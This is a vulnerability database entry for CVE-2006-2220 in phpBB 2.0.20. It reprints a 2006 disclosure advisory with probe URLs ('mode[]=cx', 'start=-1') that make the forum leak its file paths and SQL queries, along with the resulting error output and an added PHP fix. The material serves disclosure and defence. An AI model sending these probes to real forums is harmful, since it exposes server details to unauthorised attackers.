CVE-2006-2220
CVSS 5.0
Published: 2007-02-08 12:28:00
Revised: 2016-10-17 23:39:49

[Original] phpBB 2.0.20 does not properly verify user-specified input variables used as limits to SQL queries, which allows remote attackers to obtain sensitive information via a negative LIMIT specification, as demonstrated by the start parameter to memberlist.php, which reveals the SQL query in the resulting error message.


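[CNNVD] phpBB full path disclosure vulnerability (CNNVD-200702-159)

        phpBB is a web-based open-source forum application written in PHP and is fairly widely used. It supports several databases as back ends, such as Oracle, MSSQL, MySQL, PostgreSQL and others.
        Full path disclosure in phpBB, in the htmlspecialchars() function:
        ...
         if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len,
                 &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
             return;
         }
        ...
        If the variable is not a string, the full path may be disclosed.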
        

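- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: NETWORK [the attacker does not need internal-network or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2220
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2220
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200702-159
(official data source) CNNVD

- Other links and resources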

http://marc.info/?l=bugtraq&m=114695651425026&w=2
(UNKNOWN)  BUGTRAQ  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=bugtraq&m=114731067321710&w=2
(UNKNOWN)  BUGTRAQ  20060508 Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://marc.info/?l=full-disclosure&m=114685931319903&w=2
(UNKNOWN)  FULLDISC  20060505 phpBB 2.0.20 Full Path Disclosure and SQL Errors
http://securityreason.com/securityalert/837
(UNKNOWN)  SREASON  837
http://xforce.iss.net/xforce/xfdb/26306
(UNKNOWN)  XF  phpbb-multiple-path-disclosure(26306)

- Vulnerability information

phpBB full path disclosure vulnerability
Medium severity  Unknown
2007-02-08 00:00:00 2007-02-09 00:00:00
Remote

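- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        http://www.phpbb.com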

- Vulnerability information (F46123)

phpbb2020.txt (PacketStormID:F46123)
2006-05-06 00:00:00
Maksymilian Arciemowicz  securityreason.com
advisory
CVE-2006-2219,CVE-2006-2220

phpBB version 2.0.20 suffers from full path disclosure and SQL errors.

Source: http://securityreason.com/achievement_securityalert/38

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006

from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars()

...
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
		return;
	}
...

As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
	$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
	$mode = 'joined';
}
- ---Code ---

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

Problem appears if display_errors==1, but it exists on many websites. (even at php.net).

- --- 2. Sql Errors ---

Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
- ---Code ---

- ---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
- ---Result ---

- --- 3. How to fix ---
Turn off display_errors or use function like is_string().

- --- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
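
The fix suggested in section 3 of the advisory above (is_string() and display_errors off), extended with a non-negative clamp for the LIMIT offset, as an added example that is not part of the advisory or of phpBB. The helper names request_string() and request_offset(), the $max bound, the htmlspecialchars() flags and the sample input are assumptions.

```php
<?php
// Added example, not phpBB code. Helper names are hypothetical.

// Keep diagnostics out of the HTTP response; record them in the server log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return a request value only if it is a string; arrays such as mode[]=cx get the default. */
function request_string(array $source, string $key, string $default): string
{
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return $default;
    }
    return htmlspecialchars($source[$key], ENT_QUOTES, 'UTF-8');
}

/** Return a row offset clamped to 0..$max, so LIMIT never receives a negative number. */
function request_offset(array $source, string $key, int $max = 1000000): int
{
    if (!isset($source[$key]) || !is_scalar($source[$key])) {
        return 0;
    }
    $value = intval($source[$key]);
    return max(0, min($value, $max));
}

// Constructed input mirroring the two requests in the advisory:
// memberlist.php?mode[]=cx and memberlist.php?start=-1
$get = ['mode' => ['cx'], 'start' => '-1'];

$mode     = request_string($get, 'mode', 'joined');
$start    = request_offset($get, 'start');
$per_page = 50;

// Both LIMIT operands are integers produced by the helpers above.
$sql = sprintf(
    'SELECT username, user_id FROM phpbb_users WHERE user_id <> -1 '
    . 'ORDER BY user_regdate ASC LIMIT %d, %d',
    $start,
    $per_page
);

echo "mode=$mode\n";
echo "$sql\n";
```

With the constructed input, mode falls back to 'joined' and the query ends in LIMIT 0, 50, so neither the PHP warning nor the SQL error path is reached.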
    

- Vulnerability information

25568
phpBB Malformed SQL Query Information Disclosure
Information Disclosure
Loss of Confidentiality

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-05-05 Unknown
2006-05-05 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
